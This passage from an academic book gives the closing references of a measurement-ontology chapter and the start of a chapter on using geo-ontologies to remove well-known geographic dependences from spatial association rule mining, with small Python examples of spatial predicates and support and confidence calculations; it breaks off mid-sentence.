Bowers, S., & Ludäscher, B. (2004). An ontology-driven framework for data transformation in scientific workflows. Paper presented at the International Workshop on Data Integration in the Life Sciences (DILS'04), Leipzig, Germany.
Brilhante, V., & Robertson, D. (2001). Metadata-supported automated ecological modelling. In C. Rautenstrauch (Ed.), Environmental information systems in industry and public administration. Hershey, PA: Idea Group Publishing.
Campbell, A. E., & Shapiro, S. C. (1995). Ontological mediation: An overview. Paper presented at the IJCAI Workshop on Basic Ontological Issues in Knowledge Sharing.
Chen, Y., Zhou, L., & Zhang, D. (2006). Ontology-supported Web service composition: An approach to service-oriented knowledge management in corporate services. Journal of Database Management, 17(1), 67-84.
Davies, J., Duke, A., & Stonkus, A. (2002). OntoShare: Using ontologies for knowledge sharing. Paper presented at the Semantic Web Workshop of the WWW Conference, Hawaii, HI.
Duggan, D. J., Chen, M., Meltzer, P., & Trent, J. (1999). Expression profiling using cDNA microarrays. Nature Genetics, 21, 10-14.
Fenton, N. E. (1994). Software measurement: A necessary scientific basis. IEEE Transactions on Software Engineering, 20(3), 199-206.
Fikes, R., & Farquhar, A. (1999). Distributed repositories of highly expressive reusable ontologies. IEEE Intelligent Systems, 14(2), 73-79.
Finkelstein, L. (1984). A review of the fundamental concepts of measurement. Measurement, 2(1), 25-34.
Fox, M. S. (1992). The TOVE project, towards a common sense model of the enterprise. In C. Petrie (Ed.), Enterprise integration. Cambridge, MA: MIT Press.
Fox, M. S., & Gruninger, M. (1998). Enterprise modelling. AI Magazine, 19(3), 109-121.
Gandon, F. (2001, October 22-24). Engineering an ontology for a multi-agents corporate memory system. Paper presented at the ISMICK 2001 Eighth International Symposium on the Management of Industrial and Corporate Knowledge, Université de Technologie de Compiègne, France.
Gandon, F. L., & Sadeh, N. M. (2004). Semantic Web technologies to reconcile privacy and context awareness. Journal of Web Semantics, 1(3), 241-260.
Goh, C. H., Bressan, S., Madnick, S., & Siegel, M. (1999). Context interchange: New features and formalisms for the intelligent integration of information. ACM Transactions on Information Systems, 17(3), 270-293.
Grady, J. O. (1993). System requirements analysis. McGraw-Hill.
Gruber, T. R. (1993, March). Towards principles for the design of ontologies used for knowledge sharing. Paper presented at the International Workshop on Formal Ontology, Padova, Italy.
Gruber, T. R., & Olsen, G. R. (1994). An ontology for engineering mathematics. Paper presented at the Fourth International Conference on Principles of Knowledge Representation and Reasoning, Bonn, Germany.
Gruninger, M., & Fox, M. S. (1995). Methodology for the design and evaluation of ontologies. Paper presented at the Workshop on Basic Ontological Issues in Knowledge Sharing, IJCAI-95, Montreal, Canada.
Hayes, P. J. (1985). Naive physics I: Ontology for liquids. In J. Hobbs & B. Moore (Eds.), Theories of the commonsense world (pp. 71-89). Ablex Publishing Corp.
Heflin, J. (2000, April 3). Measurement ontology 1.0 (draft). Retrieved August 15, 2004, from http://www.cs.umd.edu/projects/plus/SHOE/onts/measure1.0.html
Hewett, M., Oliver, D. E., Rubin, D. L., Easton, K. L., Stuart, J. M., Altman, R. B., et al. (2002). PharmGKB: The pharmacogenetics knowledge base. Nucleic Acids Research, 30(1), 163-165.
Khatri, V., Ram, S., & Snodgrass, R. T. (2004). Augmenting a conceptual model with geospatiotemporal annotations. IEEE Transactions on Knowledge and Data Engineering, 16(11), 1324-1338.
Kim, H. M. (1999). Representing and reasoning about quality using enterprise models. Unpublished PhD thesis, Department of Industrial Engineering, University of Toronto, Toronto, Ontario, Canada.
Kim, H. M. (2002, January 7-10). XML-hoo!: A prototype application for intelligent query of XML documents using domain-specific ontologies. Paper presented at the 35th Annual Hawaii International Conference on Systems Science (HICSS-35), Hawaii, HI.
Kim, H. M., & Fox, M. S. (2002, January 4-7). Using enterprise reference models for automated ISO 9000 compliance evaluation. Paper presented at the 35th Hawaii International Conference on Systems Science (HICSS), Big Island, HI.
Kim, H. M., Fox, M. S., & Grüninger, M. (1999). An ontology for quality management: Enabling quality problem identification and tracing. BT Technology Journal, 17(4), 131-139.
Klischewski, A. R., & Jeenicke, M. (2004). Semantic Web technologies for information management within e-government services. Paper presented at the 37th Annual Hawaii International Conference on System Sciences (HICSS'04), Big Island, HI.
Kuipers, B. J. (1986). Qualitative simulation. Artificial Intelligence, 29(3), 289-338.
Lenat, D. B. (1995). CYC: A large-scale investment in knowledge infrastructure. Communications of the ACM, 38(11), 33-38.
Lesk, A. M. (2005). Database annotation in molecular biology, principles and practice. John Wiley & Sons.
Lozano-Tello, A., & Gomez-Perez, A. (2004). ONTOMETRIC: A method to choose the appropriate ontology. Journal of Database Management, 15(2), 1-18.
Mars, N. J. I. (1993, March 10-13). An ontology of measurement units. Paper presented at the International Workshop on Formal Ontologies in Conceptual Analysis and Knowledge Representation, Padova, Italy.
Massey, B. S. (1971). Units, dimensional analysis, and physical similarity. London: Van Nostrand Reinhold.
McCarthy, J., & Hayes, P. J. (1969). Some philosophical problems from the standpoint of AI. In B. Meltzer & D. Michie (Eds.), Machine intelligence (Vol. 4, pp. 463-501). Edinburgh, UK: Edinburgh University Press.
McGuinness, D. L., & van Harmelen, F. (2003). OWL Web Ontology Language overview (No. CR-owl-features-20030818). W3C.
Milton, S. K., & Kazmierczak, E. (2004). An ontology of data modelling languages: A study using a common-sense realistic ontology. Journal of Database Management, 15(2), 19-38.
Mount, D. W. (2004). Bioinformatics: Sequence and genome analysis. Cold Spring Harbor, NY: Cold Spring Harbor Laboratory Press.
Narens, L. (1985). Abstract measurement theory. Cambridge, MA: MIT Press.
Novak, G. S., Jr. (1995). Conversion of units of measurement. IEEE Transactions on Software Engineering, 21(8), 651-661.
Noy, N. F., & Hafner, C. D. (1997). The state of the art in ontology design: A survey and comparative review. AI Magazine, 18(3), 53-74.
Nozick, L. K., Turnquist, M. A., Jones, D. A., Davis, J. R., & Lawton, C. R. (2004). Assessing the performance of interdependent infrastructures and optimizing investments. Paper presented at the 37th Annual Hawaii International Conference on System Sciences, Big Island, HI.
Pease, A., & Niles, I. (2002). IEEE standard upper ontology: A progress report. Knowledge Engineering Review, 17, 65-70.
Ram, S., & Wei, W. (2004). Modeling the semantics of 3D protein structures. Paper presented at ER 2004, Shanghai, China.
Reiger, C., & Grinberg, M. (1977). The declarative representation and procedural simulations of causality in physical mechanisms. Paper presented at the Joint Conference on Artificial Intelligence.
Retz-Schmidt, G. (1988). Various views on spatial prepositions. AI Magazine, 9(2), 95-105.
Roberts, F. (1979). Measurement theory with applications to decision making, utility and the social sciences. Reading, MA: Addison-Wesley.
Ronco, L., Grossel, M., Zimmer, M., & Socash, T. (2003). Modules in emerging fields. Vol. 4: Genomics and proteomics.
SAP-AG. (1995). SAP R/3 system: Quality management (No. 4.6). Walldorf, Germany: SAP AG.
Scheaffer, R. L., & McClave, J. T. (1982). Statistics for engineers. Boston, MA: PWS Publishers.
Schlenoff, C., Balakirsky, S., Uschold, M., Provine, R., & Smith, S. (2003). Using ontologies to aid navigation planning in autonomous vehicles. The Knowledge Engineering Review, 18, 243-255.
Stevens, R., Goble, C., Horrocks, I., & Bechhofer, S. (2002). Building a bioinformatics ontology using OIL. IEEE Transactions on Information Technology in Biomedicine, 6(2), 135-141.
Stevens, R., Goble, C. A., & Bechhofer, S. (2000). Ontology-based knowledge representation for bioinformatics. Briefings in Bioinformatics, 1(4), 398-414.
Stoeckert Jr., C. J., & Parkinson, H. (2004). The MGED ontology: A framework for describing functional genomics experiments. Comparative and Functional Genomics, 4(1), 127-132.
Uschold, M., & Gruninger, M. (1996). Ontologies: Principles, methods and applications. Knowledge Engineering Review, 11(2), 93-136.
Wroe, C., Stevens, R., Goble, C., & Ashburner, M. (2003). A methodology to migrate the gene ontology to a description logic environment using DAML+OIL. Pacific Symposium on Biocomputing, 8, 624-635.
ENDNOTE
1. Facts or constants (as opposed to variables) expressed in competency questions are denoted in Greek letters within single quotes.
This work was previously published in the Journal of Database Management, Vol. 18, Issue 1, edited by K. Siau, pp. 20-42, copyright 2007 by IGI Publishing (an imprint of IGI Global).
Chapter 8.3
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies

Vania Bogorny
Universidade Federal do Rio Grande do Sul (UFRGS), Brazil, and Transnational University of Limburg, Belgium

Paulo Martins Engel
Universidade Federal do Rio Grande do Sul (UFRGS), Brazil

Luis Otavio Alvares
Universidade Federal do Rio Grande do Sul (UFRGS), Brazil
ABSTRACT

This chapter introduces the problem of mining frequent geographic patterns and spatial association rules from geographic databases. In the geographic domain most discovered patterns are trivial, non-novel, and noninteresting, because they simply represent natural geographic associations intrinsic to geographic data. A large number of these natural geographic associations are explicitly represented in geographic database schemas and geo-ontologies, but they have not been used so far in frequent geographic pattern mining. Therefore, this chapter presents a novel approach to extract patterns from geographic databases using geo-ontologies as prior knowledge. The main goal of this chapter is to show how the large amount of knowledge represented in geo-ontologies can be used to avoid the extraction of patterns that are previously known as noninteresting.
INTRODUCTION

Knowledge discovery in databases (KDD) is the nontrivial process of identifying valid, novel, potentially useful and ultimately understandable patterns from data (Fayyad et al., 1996).
In frequent pattern mining (FPM), which plays an essential role in mining associations, one of the main problems is the large number of generated patterns and rules. In geographic databases this problem increases significantly because most discovered patterns include well-known natural associations intrinsic to geographic data. While in transactional databases items are assumed to be independent from each other (e.g., milk, cereal, bread), independently of their meaning, in geographic databases a large amount of data is semantically dependent (e.g., island within water). Geographic dependences are semantic constraints that must hold in geographic databases (GDB) to warrant the consistency of the data (e.g., an island must be completely located inside a water body). They are part of the concept of geographic data and are explicitly represented in geo-ontologies. Without considering the semantics of geographic data, the same geographic dependences explicitly represented in geo-ontologies and geographic database schemas are unnecessarily extracted by association rule mining algorithms and presented to the user. Geographic dependences produce two main problems in the process of mining spatial association rules:

a. Data preprocessing: A large computational time is required to preprocess GDB to extract spatial relationships (e.g., intersections between districts and water bodies). The spatial join operation (in the worst case a Cartesian product), required to extract spatial relationships, is the most expensive operation in databases and the processing bottleneck of spatial data analysis and knowledge discovery.

b. Frequent pattern and association rule generation: A large number of patterns and spatial association rules without novel, useful, and interesting knowledge is generated (e.g., is_a(Island) → within(Water)).
Aiming to improve geographic data preprocessing and eliminate well-known geographic dependences in geographic FPM in order to generate more interesting spatial association rules (SAR), this chapter presents a unified framework for FPM considering the semantics of geographic data, using geo-ontologies. While dozens of spatial and nonspatial FPM algorithms define syntactic constraints and different thresholds to reduce the number of patterns and association rules, we consider semantic knowledge constraints (Bogorny et al., 2005b), and eliminate the exact sets of geographic objects that produce well-known patterns (Bogorny et al., 2006b, 2006c). The main objective of this chapter is to show the important role that ontologies can play in the knowledge discovery process using the FPM technique. The focus addresses the use of semantic knowledge stored in ontologies to reduce uninteresting patterns, but not to create ontologies for data mining. The remainder of the chapter is organized as follows: Section 2 presents some background concepts about geographic data, spatial relationships, spatial integrity constraints, and geo-ontologies. Section 3 introduces the concepts of frequent patterns and spatial association rules, the problem generated by geographic dependences in both data preprocessing and spatial association rule mining, and what has been done so far to alleviate this problem. Section 4 presents a framework to improve geographic data preprocessing and spatial association rule mining using geo-ontologies. Experiments are presented to show the significant reduction in the number of frequent patterns and association rules. Section 5 presents future trends and Section 6 concludes the chapter.
BACKGROUND

Geographic data are real world entities, also called spatial features, which have a location on Earth’s surface (Open GIS Consortium, 1999a).
Spatial features (e.g., Brazil, Argentina) belong to a feature type (e.g., country), and have both nonspatial attributes (e.g., name, population) and spatial attributes (geographic coordinates x,y). The latter normally represent points, lines, polygons, or complex geometries. In geographic databases, every different feature type is normally stored in a different database relation, since most geographic databases follow the relational approach (Shekhar & Chawla, 2003). Figure 1 shows an example of how geographic data can be stored in relational databases. There is a different relation for each geographic object type (street, water resource, and gas station), which can also be called spatial layers (Shekhar & Chawla, 2003). The spatial attributes of geographic object types, represented by shape in Figure 1, have implicitly encoded spatial relationships (e.g., close, far, contains, intersects). Because of these relationships, real world entities can affect the behavior of other features in the neighborhood. This makes spatial relationships the main characteristic of geographic data to be considered for data mining and knowledge discovery (Ester et al., 2000; Lu et al., 1993), and the main characteristic that separates spatial data mining from nonspatial data mining.

The process of extracting spatial relationships brings together many interesting and uninteresting spatial associations. Figure 2 shows an example where gas stations and industrial residues repositories may have any type of spatial relationship with water resources. Considering, for example, that a water analysis showed high chemical pollution, the different spatial relationships among water resources, gas stations, and industrial residues repositories will be interesting for knowledge discovery. Notice in Figure 2 that there is no standard pattern among the data. Figure 3 shows two examples of spatial relationships that represent well-known geographic domain dependences. In Figure 3 (left), viaducts intersect streets, and bridges intersect both water resources and streets, since both bridges and viaducts have the semantics of connecting streets. In Figure 3 (right), gas stations intersect streets because they only exist in areas with street access. The main difference between the examples shown in Figure 2 and Figure 3 is that in the former the spatial relationships may hold or not, and
Figure 1. Example of geographic data storage in relational databases
Figure 2. Examples of implicit spatial relationships (industrial residues repositories, gas stations, water resources)
Figure 3. Examples of spatial relationships that produce well-known geographic patterns in spatial data mining (left: bridges and viaducts, streets, water resources; right: gas station, street)
may lead to more interesting patterns. In the latter, apart from rare exceptions or some geographic location inconsistency, the spatial relationships hold for practical purposes in 100% of the cases, and will produce well-known geographic domain patterns in the discovery process. If considered in association rule mining, well-known spatial relationships will generate high-confidence rules such as is_a(Viaduct) → intersect(Street) (99%) or is_a(GasStation) → intersect(Street) (100%).
Although users might be interested in high confidence rules, not all strong rules necessarily hold considerable information. Moreover, the mixed presentation of thousands of interesting and uninteresting rules can discourage users from interpreting them in order to find novel and unexpected knowledge (Appice et al., 2005). Patterns in the discovery process should be considered interesting when they represent unknown strong regularities, rare exceptions, or
Figure 4. Spatial relationships: (a) distance, (b) direction/order, (c) topological (equals, crosses, touches, contains/within, overlaps)
when they help to distinguish different groups of data. In geographic databases, however, there are a large number of patterns intrinsic to the data, which represent strong regularities, but do not add novel and useful knowledge to the discovery. They are mandatory spatial relationships which represent spatial integrity constraints that must hold in order to warrant the consistency of geographic data.
Spatial Relationships and Spatial Integrity Constraints

Spatial relationships can be classified as distance, direction, and topological. Distance relationships are based on the Euclidean distance between two spatial features, as shown in Figure 4(a). Direction relationships deal with the order in which spatial features are located in space, such as north, south, east, and so forth, as shown in Figure 4(b). Topological relationships describe concepts of adjacency, containment, and intersection between two spatial features, and remain invariant under topological transformations such as rotating and scaling. Figure 4(c) shows examples of topological relationships, which will be the focus in this chapter. Binary topological relationships are mutually exclusive, and there are many approaches in the literature to formally define a set of topological relationships among points, lines, and polygons
(Clementini et al., 1993; Egenhofer & Franzosa, 1995). The Open GIS Consortium (OGC) (Open GIS Consortium, 2001), an organization dedicated to developing standards for spatial operations and spatial data interchange to provide interoperability between Geographic Information Systems (GIS), defines a standard set of topological operations: disjoint, overlaps, touches, contains, within, crosses, and equals. Topological relationships can be mandatory, prohibited, or possible. Mandatory and prohibited spatial relationships represent spatial integrity constraints (Cockcroft, 1997; Servigne et al., 2000), and their purpose is to warrant and maintain both the quality and the consistency of spatial features in geographic databases. Mandatory spatial integrity constraints are normally represented by cardinalities one-one and one-many in geographic data conceptual modeling (Bogorny & Iochpe, 2001; Servigne et al., 2000; Shekhar & Chawla, 2003) in order to warrant that every instance of a geographic feature type is spatially related to at least one instance of another spatial feature type (e.g., “island within water body”). In data mining, such constraints produce well-known patterns and high confidence rules because of the strong correlation of the data. While mandatory relationships must hold, prohibited relationships should not (e.g., “road cannot contain river”).
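To make the OGC predicate set concrete, the short sketch below evaluates the seven topological operations on two toy geometries. It assumes the Shapely library as a stand-in for the equivalent operations of any OGC-compliant GIS or spatial database; the feature names and coordinates are purely illustrative.

```python
# Hedged sketch: evaluating the standard OGC topological predicates with
# Shapely (assumed available). Geometries and names are toy examples only.
from shapely.geometry import LineString, Polygon

road = LineString([(0, 0), (10, 0)])                        # a road segment
gas_station = Polygon([(4, 0), (6, 0), (6, 2), (4, 2)])     # sits along the road
district = Polygon([(-1, -1), (11, -1), (11, 5), (-1, 5)])  # contains the road

ogc_predicates = ["disjoint", "overlaps", "touches", "contains",
                  "within", "crosses", "equals"]

for a_name, a, b_name, b in [("gas_station", gas_station, "road", road),
                             ("district", district, "road", road)]:
    holding = [p for p in ogc_predicates if getattr(a, p)(b)]
    print(f"{a_name} vs {b_name}: {holding}")
# Expected: gas_station vs road: ['touches']
#           district vs road: ['contains']
```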
Possible relationships, however, are usually not explicitly represented, since they can either exist or not (e.g., “roads cross water bodies,” “counties contain factories”). Possible relationships may produce more interesting patterns, and are therefore the most relevant to find novel and useful knowledge in spatial data mining. Mandatory constraints are well-known concepts to geographers and geographic database designers, and are normally explicitly represented in geographic database schemas (Bogorny et al., 2006b, 2006c) and geo-ontologies (Bogorny et al., 2005b).
Geo-Ontologies and Spatial Integrity Constraints

An ontology is an explicit specification of a conceptualization (Gruber, 1993). More specifically, an ontology is a logic theory corresponding to the intended meaning of a formal vocabulary, that is, an ontological commitment to a specific conceptualization of the world (Guarino, 1998). It is an agreement about the meaning and structure of the concepts of a specific domain. Each concept definition must be unique, clear, complete, and nonambiguous. The structure represents the properties of the concept, including a description, attributes, and relationships with other concepts. Ontologies have recently been used in many different fields of computer science, such as artificial intelligence, databases, conceptual modeling, the Semantic Web, and so forth. Therefore, a considerable number of ontologies have been proposed, and a number of models, languages, and tools have been developed. Chaves et al. (2005a), besides defining a geo-ontology for administrative data for the country of Portugal, define a metamodel, named GKB (geographic knowledge base), which is a starting point to define an ontology for geographic data. In geo-ontologies, spatial integrity constraints are represented by properties of geographic data. They are specified as restriction properties given
by a spatial relationship and both minimum and maximum cardinalities. For instance, a concept island, which is a piece of land surrounded by water, must have a mandatory one-one relationship with the concept water. Figure 5 shows a small example of a geographic ontology with the specification of different topological relationships, generated with Protégé, in order to illustrate how mandatory semantic constraints are represented. In the example in Figure 5, gas stations and bus stops must have a mandatory constraint with road because every gas station and every bus stop must topologically touch one or more instances of a road. Roads, however, do not necessarily have gas stations or bus stops, so their relationship is not represented. Cities must also contain at least one road, while roads have no mandatory relationship with city. Notice in the OWL representation that minimum cardinality 1 is explicitly represented and can be easily retrieved. To evaluate the amount of well-known dependences in real geo-ontologies, we analyzed the first geo-ontology of Portugal, named geo-net-pt01 (Chaves et al., 2005b). Although not all elements of the geographic domain have been defined in geo-net-pt01, there are many one-one and one-many dependences. The repository of the geo-ontology stores three levels of information: geo-administrative, geophysical, and network. The geo-administrative level stores administrative information about territorial division, and includes geographic feature types such as municipalities, streets, and so forth. The network level stores nonspatial data and relationships about the geo-administrative layer (e.g., population of a district). The geophysical level stores feature types including continents, oceans, lakes, bays, water bodies, and so forth. In geo-net-pt01, among 58 different spatial feature types, 55 one-one relationships were defined in the geo-administrative level. The following section introduces the problem of mining geographic data with well-known dependences.
Figure 5. Geo-ontology representation and OWL code
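As a concrete illustration of how such cardinality restrictions can be read back from an OWL file like the one sketched in Figure 5, the snippet below lists every class that is constrained by a minimum cardinality of at least 1 on some property. It assumes the rdflib library and a hypothetical file name (geo_ontology.owl); depending on how the ontology was exported, the restriction vocabulary may differ slightly (e.g., OWL 2 exports may use owl:minQualifiedCardinality with owl:onClass).

```python
# Hedged sketch: retrieving mandatory constraints (minCardinality >= 1) from a
# geo-ontology in OWL. The file name and feature-type names are assumptions;
# only the rdflib API and the OWL/RDFS vocabulary are standard.
from rdflib import Graph

g = Graph()
g.parse("geo_ontology.owl", format="xml")   # hypothetical export such as Figure 5

query = """
PREFIX owl:  <http://www.w3.org/2002/07/owl#>
PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>
SELECT ?featureType ?relation ?card WHERE {
    ?featureType rdfs:subClassOf ?restriction .
    ?restriction a owl:Restriction ;
                 owl:onProperty ?relation ;
                 owl:minCardinality ?card .
    FILTER (?card >= 1)
}
"""
for feature_type, relation, card in g.query(query):
    # Each answer is a mandatory constraint, e.g., GasStation touches >= 1 Road.
    print(f"{feature_type} --{relation}--> minCardinality {card} (mandatory)")
```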
THE PROBLEM OF GEOGRAPHIC DEPENDENCES IN SPATIAL ASSOCIATION RULE MINING

In transactional data mining, every row in the dataset to be mined is usually a transaction and columns are items, while in spatial data mining every row is an instance (e.g., Buenos Aires) of a reference object type (e.g., city), called the target feature type, and columns are predicates. Every column is either a nonspatial attribute (e.g., population) of the target feature type or a spatial predicate. A spatial predicate is a relevant feature type that is spatially related to specific instances of the target feature type (e.g., contains(Factory)). Spatial predicates are extracted with operations provided by GIS, and can be represented at different granularity levels (Han & Fu, 1995; Lu et al., 1993), according to the objective of the discovery.
For example, chemical factory, metallurgical factory, and textile factory could be used instead of factory. Spatial predicates are computed with spatial joins between all instances t of a target feature type T (e.g., city) and all instances o (e.g., Rio de la Plata) of every relevant feature type O (e.g., river) in a set of relevant feature types S (e.g., river, port, street, factory) that have some spatial relationship (e.g., touches, contains, close, far) with T. Given a set of instances T = {t1, t2, …, tn}, a set of relevant feature types S = {O1, O2, …, Om}, and Oi = {o1, o2, …, oq}, the extraction of spatial predicates implies the comparison of every instance of T with every instance of O, for every O ∈ S. The spatial predicate computation is the first step for extracting association rules from geographic databases.
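A minimal in-memory illustration of this step is sketched below. It assumes Shapely geometries already loaded into Python dictionaries (the city, port, and factory names are invented) and produces one row per target instance, which is essentially the single-table format used later by the mining step.

```python
# Hedged sketch of spatial predicate extraction: every instance of the target
# feature type T is compared with every instance of every relevant feature
# type O in S, yielding one boolean predicate column per relevant feature type.
from shapely.geometry import Point, Polygon

cities = {                                   # target feature type T (toy data)
    "CityA": Polygon([(0, 0), (10, 0), (10, 10), (0, 10)]),
    "CityB": Polygon([(20, 0), (30, 0), (30, 10), (20, 10)]),
}
relevant = {                                 # set S of relevant feature types
    "Port":    {"Port1": Point(5, 5)},
    "Factory": {"Factory1": Point(25, 5), "Factory2": Point(50, 50)},
}

def extract_predicates(targets, relevant_types, relation="contains"):
    """Return {target instance: {predicate: bool}}, the single-table input."""
    rows = {}
    for t_name, t_geom in targets.items():
        row = {}
        for o_type, instances in relevant_types.items():
            # The predicate holds if it holds for at least one instance of O.
            row[f"{relation}({o_type})"] = any(
                getattr(t_geom, relation)(o_geom) for o_geom in instances.values())
        rows[t_name] = row
    return rows

print(extract_predicates(cities, relevant))
# {'CityA': {'contains(Port)': True, 'contains(Factory)': False},
#  'CityB': {'contains(Port)': False, 'contains(Factory)': True}}
```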
An association rule is an implication of the form X → Y, where X and Y are sets of items co-occurring in a given tuple (Agrawal, Imielinski & Swami, 1993). Spatial association rules are defined in terms of spatial predicates, where at least one element in X or Y is a spatial predicate (Koperski & Han, 1995). For example, is_a(Slum) ∧ far_from(WaterNetwork) → disease=Hepatitis is a spatial association rule. We assume that F = {f1, f2, …, fk, …, fn} is a set of nonspatial attributes (e.g., population) and spatial predicates (e.g., close_to(Water)) that characterize a reference feature type, and that Ψ (the dataset) is a set of instances of the reference feature type, where each instance is a row W such that W ⊆ F. There is exactly one tuple in the dataset to be mined for each instance of the reference feature type. The support s of a predicate set X is the percentage of tuples in which X occurs as a subset. The support of the rule X → Y is given as s(X ∪ Y). The rule X → Y is valid in Ψ with confidence factor 0 ≤ c ≤ 1 if at least c% of the instances in Ψ that satisfy X also satisfy Y. The notation X → Y (c) specifies that the rule X → Y has confidence factor c; more precisely, the confidence factor is given as s(X ∪ Y)/s(X). The general problem of mining spatial association rules can be decomposed into three main steps, where the first is usually performed as a data preprocessing method:

a. Extract spatial predicates: A spatial predicate is a spatial relationship (e.g., distance, order, topological) between the reference feature type and a set of relevant feature types.

b. Find all frequent patterns/predicates: A set of predicates is a frequent pattern if its support is at least equal to a certain threshold, called minsup.

c. Generate strong rules: A rule is strong if it reaches minimum support and its confidence is at least equal to a certain threshold, called minconf.

Assertion 1 (Agrawal & Srikant, 1994): if a predicate set Z is a frequent pattern, then every subset of Z is also frequent. If Z is infrequent, then every set that contains Z is infrequent too. All rules derived from Z satisfy the support constraint if Z satisfies the support constraint.

Well-known geographic dependences appear in all three steps of the spatial association rule mining process. In the first step (a), well-known geographic dependences may exist between T and any O in S. In the second (b) and third (c) steps, dependences exist among relevant feature types, that is, between pairs of feature types in S. In the following sections we describe the problem that such dependences generate in frequent geographic pattern mining and what has been done so far to reduce it.
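The support and confidence definitions above can be evaluated directly on the single-table representation. The toy sketch below is only an illustration of the formulas; the predicate names and rows are invented.

```python
# Hedged sketch of the definitions: s(X) is the fraction of rows containing X,
# and conf(X -> Y) = s(X ∪ Y) / s(X). Rows and predicate names are toy data.
dataset = [  # one predicate set per instance of the reference feature type
    {"contains(Port)", "crosses(Water Body)", "contains(Street)"},
    {"contains(Factory)", "contains(Street)"},
    {"contains(Port)", "crosses(Water Body)"},
    {"contains(Hospital)", "contains(Street)"},
]

def support(predicates, rows):
    return sum(predicates <= row for row in rows) / len(rows)

def confidence(antecedent, consequent, rows):
    return support(antecedent | consequent, rows) / support(antecedent, rows)

X, Y = {"contains(Port)"}, {"crosses(Water Body)"}
print(f"s(X u Y)     = {support(X | Y, dataset):.2f}")    # 0.50
print(f"conf(X -> Y) = {confidence(X, Y, dataset):.2f}")  # 1.00
```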
Geographic Dependences Between the Target Feature Type and Relevant Feature Types

In data preprocessing, time and effort are required from the data mining user to extract spatial relationships and transform geographic data into a single table or single file, which is the input format required by most data mining algorithms. Even in multirelational data mining, where geographic data are transformed to first-order logic, the process of extracting spatial relationships is required. The problem of which spatial relationships should be considered for knowledge discovery has been addressed in earlier works. Koperski and Han (1995) and Lu et al. (1993) presented a top-down progressive refinement method where spatial approximations are calculated in a first step and, in a second step, more precise spatial relationships are computed on the outcome of the first step. The method has been implemented in the module Geo-Associator of the GeoMiner system
(Han, Koperski & Stefanovic, 1997), which is no longer available. Ester et al. (2000) proposed new operations such as graphs and paths to compute spatial neighborhoods. However, these operations are not implemented by most GIS, and computing all relationships between all objects in the database in order to obtain the graphs and paths is computationally expensive for real databases. Appice et al. (2005) proposed an upgrade of Geo-Associator to first-order logic, in which all spatial relationships are extracted. This process is computationally expensive and nontrivial in real databases. While the above approaches consider different spatial relationships and any geometric object type, a few approaches, such as Huang, Shekhar, and Xiong (2004) and Yoo and Shekhar (2006), compute only distance relationships for point object types. Table 1 shows an example of a spatial dataset at a high granularity level, where every row is a city and predicates refer to different geographic object types (port, water body, hospital, street, and factory) spatially related to city. Let us consider two geographic dependences: city and street, and port and water body, where the former is between the target feature type and a relevant feature type
and the latter is between the two relevant feature types. In the dataset shown in Table 1, the dependence between the target feature type city and the relevant feature type street is explicit, because every city has at least one street and the predicate contains(Street) has 100% support. Predicates with 100% support appear in at least half of the total number of patterns and generate a large number of noninteresting association rules. For example, a rule such as contains(Factory) → contains(Street) expresses that cities that contain factories also contain streets. Although such a rule seems to be interesting, it can be considered obvious due to the simple fact that all cities contain streets, whether they have factories or not. Table 2 shows the result of a small experiment performed with Apriori (Agrawal & Srikant, 1994) over the dataset in Table 1. Considering 20% minimum support, 31 frequent sets and 180 rules were generated. Among the 31 frequent sets and the 180 rules, 16 frequent sets and 130 rules had the dependence contains(Street). Notice that increasing minimum support to 50% does not warrant the elimination of the geographic dependence. Although the number of frequent
Table 1. Example of a preprocessed dataset in a high granularity level for mining frequent patterns and SAR
Table 2. Frequent patterns and rules with dependences
sets is reduced to 25 and rules to 96, 13 frequent sets and 72 rules still have the dependence. Geographic dependences, besides generating a large number of well-known patterns and association rules, require unnecessary spatial joins. To illustrate the power that semantics may have in spatial join computation, let us consider a few examples, shown in Table 3. Without considering semantics, all topological relationships between two spatial feature types would be tested in order to verify which one holds. Considering semantics, the number of relationships to test is reduced significantly. As shown in Table 3, the only topological relationship semantically consistent between gas station and road should be touches. A city hall must be within a city, while a water body can be disjoint from, touch, or cross a road. Although the topological relationships shown in Table 3 are semantically possible, not all of them are interesting for knowledge discovery. So, if besides considering the semantics of spatial features we also consider spatial integrity constraints, it is possible to further reduce the number of topological relationships and define which should be computed for knowledge discovery. Remembering
that mandatory relationships produce well-known patterns and that only possible relationships are interesting for knowledge discovery, Table 4 shows the topological relationships of the same objects in Table 3 that would be computed if semantics and integrity constraints were considered. The pairs gas station and road, bridge and water body, city hall and city, as well as treated water net and city have mandatory one-one or one-many constraints, and no relationship is necessary for KDD. Although mandatory and prohibited constraints do not explicitly define the interesting spatial relationships to be extracted for knowledge discovery, we are able to eliminate those which are either mandatory or prohibited, and specify those which are possible, as will be explained in Section 4.
Geographic Dependences Among Relevant Feature Types

To find frequent predicate sets and extract strong association rules, predicates are combined with each other for the different instances of the target feature type T, and not between T and O as explained in the previous section.
Table 3. Possible and mandatory topological relationships considering semantics of feature types
Table 4. Possible topological relationships for knowledge discovery
To illustrate the geographic dependence replication process in frequent geographic pattern mining, let us consider the frequent set generation introduced by Agrawal and Srikant (1994) for the Apriori algorithm. Apriori performs multiple passes over the dataset. In the first pass, the support of the individual elements is computed to determine the large 1-predicate sets. In the subsequent passes, given k as the number of the current pass, the large sets Lk-1 found in the previous pass (k-1) are grouped into sets Ck with k elements, which are called candidate sets. The support of each candidate set is computed, and if it is equal to or higher than the minimum support, then this set is considered frequent/large. This process continues until the number of large sets is zero. Geographic dependences appear for the first time in frequent sets with 2 elements, where k=2. Table 5 shows the frequent sets extracted from the dataset in Table 1 with 50% minimum support, where k is the number of elements in the frequent sets. Notice that since the dependence has minimum support, that is, it is a frequent predicate set, this dependence is replicated to many frequent sets of size k>2 with predicates that reach minimum support, as shown in bold style in Table 5. Considering such a small example and a high minimum support, one single geographic dependence participates in six frequent sets, which represents 30% of the frequent sets. Notice that the number of rules having a geographic dependence will be much larger than the number of frequent sets, mainly when the largest frequent set (with 4 elements) contains the dependence. In Table 5, we can observe that the technique of generating closed frequent sets (Pasquier et al., 1999; Zaki & Hsiao, 2002) would not eliminate geographic dependences, because both sets with 4 elements that contain the dependence are closed frequent sets. The closed frequent set approach eliminates redundant frequent sets, but does not eliminate well-known dependences if applied to the geographic domain. In order to evaluate the amount of well-known rules generated with the dependence, let us observe Table 6, which shows a few examples of association rules generated with frequent predicate sets of size 2 {contains(Port), crosses(Water Body)}, size 3 {contains(Port), 